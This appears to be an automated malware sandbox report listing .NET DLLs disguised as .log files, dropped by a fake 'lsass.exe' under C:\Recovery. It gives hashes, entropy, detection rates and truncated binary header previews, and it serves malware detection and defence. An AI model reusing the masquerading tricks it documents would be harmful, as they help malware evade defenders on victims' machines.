SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\XmyUnkUi.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\YBBlCWWw.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\ZPkAsstD.log

Download File

Process:	C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\brdjWOxr.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\dhGiqFYl.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\gVSkXNZP.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\gtMhCYIK.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\gvHJzrMq.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\heJamQmd.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\iAcIGVjp.log

Download File

Process:	C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\icHKrlAV.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\kwMHLMmE.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\nDKQhfgz.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\nPayaidT.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\oZQzjlbX.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\phNJAZcc.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\qjmAjDHY.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\reDyPeef.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ryfhxvpx.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
